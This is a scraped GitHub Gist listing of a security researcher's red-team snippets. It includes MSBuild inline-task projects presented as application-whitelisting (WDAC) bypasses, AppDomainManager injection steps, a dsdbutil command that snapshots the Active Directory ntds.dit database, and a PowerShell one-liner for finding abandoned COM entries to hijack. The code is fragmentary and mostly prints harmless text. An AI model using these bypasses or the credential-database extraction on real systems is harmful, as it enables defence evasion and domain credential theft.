Skip to content

Instantly share code, notes, and snippets.

bohops / SimpleExportExampleDll.cpp
Last active Jun 12, 2020
Simple Export Dll Example
View SimpleExportExampleDll.cpp
#include "pch.h"
#define EXPORT extern "C" __declspec(dllexport)
EXPORT void HelloWorld()
MessageBox(0, L"Hello World!", 0, 0);
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
bohops /
Created Apr 30, 2020
GhostLoader - AppDomainManager - Injection - 攻壳机动队

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
View simple_msbuild.csproj
<Project ToolsVersion="4.0" xmlns="">
<UsingTask TaskName="HelloWorld" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<Code Type="Fragment" Language="cs">
<![CDATA[Console.WriteLine(":-) CSHARP :-)");]]>
<Target Name="Build">
<HelloWorld />
bohops / dsdbutil.exe
Last active Mar 29, 2020
yet another native AD database extraction utility
View dsdbutil.exe
- dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases []
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with
- Example #1: Using Snapshot GUID obtained from cmd output
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
View msbuild_14_xsltransformation.csproj
<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
<Project DefaultTargets="RunMe" xmlns="">
<Target Name="RunMe">
XmlContent="&lt;?xml version=&quot;1.0&quot;?&gt;&lt;?xml-stylesheet type=&quot;text/xsl&quot;?&gt;&lt;a&gt;&lt;b&gt;&lt;c&gt;d&lt;/c&gt;&lt;/b&gt;&lt;/a&gt;"
OutputPaths="delete_me.txt" />
bohops / poc.png
Created May 22, 2019
MSBuild - Property functions -
View poc.png
<Project ToolsVersion="4.0" xmlns="" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View dotnetcore_msbuild_rosylyn_poc.csproj
<!-- dotnet.exe msbuild rosylyn_poc.csproj -->
<!-- WDAC/AWL Bypass with Dot Net Core (2.2.x) MSBuild (16.x) and the Rosyln Compiler -->
<Project DefaultTargets="Build">
<UsingTask TaskName="HelloWorld" TaskFactory="RoslynCodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll">
<Code Type="Fragment" Language="cs">
<![CDATA[Console.WriteLine($":-) CSHARP :-)");]]>
View gethelp.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
bohops / WSH_approved_list.txt
Created Mar 13, 2019 — forked from mattifestation/WSH_approved_list.txt
WldpIsClassInApprovedList approved classID for WLDP_HOST_ID_WSH hosts (which includes COM scriptlets)
View WSH_approved_list.txt
View Abandoned_COM_PowerShell.txt
- Abandoned COM Discovery Script.
- Makes a few assumptions, needs refinement (e.g. doesn't account for all extensions)
function GetMissing($server){$clsids=@{};cd $env:windir'\system32\';$srv=gwmi Win32_COMSetting | ?{$_.$server -ne $null};$srv | ForEach {$clsids.add($_.ComponentId,$_.$server)};$clsids.Keys | foreach {$p=[Environment]::ExpandEnvironmentVariables($clsids[$_]);$p=$p.Replace('"','');if($p.Contains('.exe ')){$p=$p.Substring(0,$p.IndexOf('.exe'))+'.exe'};if($(test-path $p) -eq $False){$_+' | '+$server+' | '+$p}}};GetMissing('LocalServer');GetMissing('LocalServer32');GetMissing('InprocServer');GetMissing('InprocServer32')
You can’t perform that action at this time.